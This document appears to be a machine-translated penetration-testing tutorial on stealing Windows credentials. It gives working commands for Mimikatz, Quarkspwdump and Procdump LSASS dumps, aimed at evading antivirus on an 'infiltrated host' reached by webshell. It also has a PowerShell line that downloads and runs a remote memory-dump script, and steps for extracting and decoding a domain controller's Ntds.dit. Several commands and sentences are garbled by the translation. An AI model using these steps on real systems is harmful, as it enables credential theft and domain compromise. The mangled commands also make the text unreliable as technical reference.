about Windows System password fetching

0x01 Windows password Hash

The early SMB protocol transmits plaintext passwords over the network. Later, the "LAN Manager challenge/response" authentication mechanism, called LM, is so simple that it can be easily cracked. Microsoft has proposed a WindowsNT challenge/response verification mechanism, called NTLM. There is now an updated NTLMV2 and Kerberos authentication system. Windows encrypted passwords password, we call it hash (Chinese: hash), Windows system password hash By default generally consists of two parts: the first part is Lm-hash, the second part is Ntlm-hash.

Ntlm-hash and Lm-hash algorithm, clear text password case sensitive, but not according to Ntlm-hash determine whether the original plaintext password is less than 8 bytes, get rid of the magic string "[email protected]#$%". MD4 is a true one-way hash function, which is more difficult for the data source to appear in clear text. The problem is that Microsoft insists that Ntlm-hash's strength is high, but to avoid the fact that, in order to maintain backward compatibility, ntlm-hash default is always used with Lm-hash. This means that Ntlm-hash's emphasis on higher is not safe, but potentially damaging to security. After adding Ntlm-hash, first use Lm-hash's weaknesses to cite the original plaintext password of the case-insensitive version, and then use Ntlm-hash to correct the original plaintext password case-sensitive version.

The hash password format under Windows system is: User name: Rid:lm-hash value: Nt-hash value, for example: Administrator:500:c8825db10f2590eaaad3b435b51404ee : 683020925c5d8569c23aa724774ce6cc::: Indicates

User name is: Administrator

RID is: 500

The Lm-hash value is: C8825db10f2590eaaad3b435b51404ee

The Nt-hash value is: 683020925c5d8569c23aa724774ce6cc

If you know the user's hash password, take the c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to hash online search site.

0x02 Quarkspwdump

Generally use QUARKSPWDUMP_V0.2B to crawl the entire Windows series of password hash, will get the hash value in http://www.objectif-securite.ch/ophcrack.php query.

Quarkspwdump the command to crawl the password is as follows: (other commands can refer to the software description)

Quarkspwdump.exe-dhl

Get the entire hash value taken to hack online.

0x03 Mimikatz

Password grabber artifact Mimikatz to test, command as follows:

Privilege::d Ebug
Sekurlsa::logonpasswords

The results of the diagram are as follows:

have found, Mimikatz and Quarkspwdump crawl Lm-hash is different, and Mimikatz directly to the system password to take. Nt-hash two software gets the same result.

In the penetration testing process will appear this scenario, I have chopper connected to the other host, but the system installed by default 360 security guard or other security software. I uploaded the Mimikatz and quarkspwdump have been avira. That is to say, I want to use these two software conventional ideas to get the system's password hash is not likely. In fact, we can first dump the other host's lsass memory files, and then in their own host with Mimikatz processing, so you can get the other host system hash and password.

can go to the official website of Microsoft to download Prodump, this certainly will not cause anti-virus software to report poison and Avira.

The command is as follows:

Procdump.exe-accepteula-ma Lsass.exe Lsass.dmp

This is illustrated below:

Next, we will demonstrate the local use of Mimikatz to crack:

First enter the command:

" sekurlsa::minidump lsass.dmp "

Then enter the command:

Sekurlsa::logonpasswords

Can see, can get offline to get the system password, so you can bypass antivirus software on the other side of the killing.

In the cloud knowledge base, there are also commands to see the same work done with PowerShell in Prodump. The specific commands are as follows:

PowerShell IEX (New-object net.webclient). Downloadstring (' Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 '); "Get-process Lsass | Out-minidump "

I tried it on the infiltrated host and found it to be possible, but the chopper virtual terminal will show an error, and the PowerShell code has actually been executed successfully. But the overall feeling is still more convenient to use Prodump.

There are also integrated Mimkatz in the Metasploit. Specific tutorials can refer to Http://www.offensive-security.com/metasploit-unleashed/Mimikatz

0X04 Ntdsdump Related

Can't stand ntdsxtract turtle speed, so with Quarkspwdump changed a can read System.hiv offline version of the extraction tool.

Ntds.dit is actually a esent database, Microsoft itself has a series of documentation API to operate the database.

Its command line is as follows:

Ntdsdump.exe <-f ntds.dit> <-k Hex-sys-key | -S system.hiv> [-o out.txt] [-h] [-t john| LC]

-F Ntds.dit Path

-K optional hexadecimal format of SYSKEY

-S optional System.hiv path

-H Export History password record

-T export format, LC or John

-O export to the specified file

Syskey is actually the type information Hklm\system\currentcontrolset\control\lsa the following subkeys, which can be queried by RegQueryInfoKey.

The attachment provides two export tools, Getsyskey_c.exe compiled by VC6, its source code for Getsyskey.cpp, with the VC6 directly open the compilation can be.

Getsyskey_cs.exe compiled by. net2.0, source code for Getsyskey.cs, with CSC directly compiled.

Known error:

Jetattachdatabase () failed

Cause: The database needs to be repaired and executed esentutl/p/O Ntds.dit for repair.

：

Ntdsdump

Another: After the change and looked at Quarkspwdump's GitHub, found someone submitted a pull REQUEST:HTTPS://GITHUB.COM/QUARKSLAB/QUARKSPWDUMP/PULL/3

It adds a function to load the System.hiv, calling the RegLoadKey. And this API must be over UAC, so it is very awkward to use, as this directly read the file to deal with the happy.

Safe Pulse Posture

Export Ntds.dit, Sam, and system using Ntdsutil snapshot mount on the 2008+ domain control,

Ntdsutilsnapshotactivate Instance Ntdscreate Mount {guid}copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.ditunmount {Guid}quitquit Then it's all kinds of copy.

Use QuarksPwDump.exe to export most plaintext on domain control:

QuarksPwDump.exe--dump-hash-domain--output SecPulseHash.txt--ntds-file c:\ntds.dit

Download back to local re-use quarkspwdump doesn't seem to work, mainly because the system file cannot be specified locally, resulting in a key not being obtained

Attached quarks pwdump Use parameters:

Quarks-pwdump.exe <options>

Options:

-DHL--dump-hash-local

-DHDC--dump-hash-domain-cached

-DHD--dump-hash-domain (Ntds_file must be specified)

-db--dump-bitlocker (Ntds_file must be specified)

-nt--ntds-file File

-hist--with-history (optional)

-T--output-type john/lc (optional, if no=>john)

-O--output FILE (optional, if no=>stdout)

Example:quarks-pwdump.exe--dump-hash-domain--with-history

Of course, you can also download Ntds.dit, Sam and System back (many of the network NTDs are several g, download back not too scientific) with a tool to decrypt but it feels a bit large, now we can use NTDSDump.exe

Ntdsdump.exe-f ntds.dit-s System-o SecPulseHash.txt

0x05 Reference Links

Https://www.secpulse.com/archives/6301.html

Https://www.cnblogs.com/hiccup/p/4380298.html

about Windows System password fetching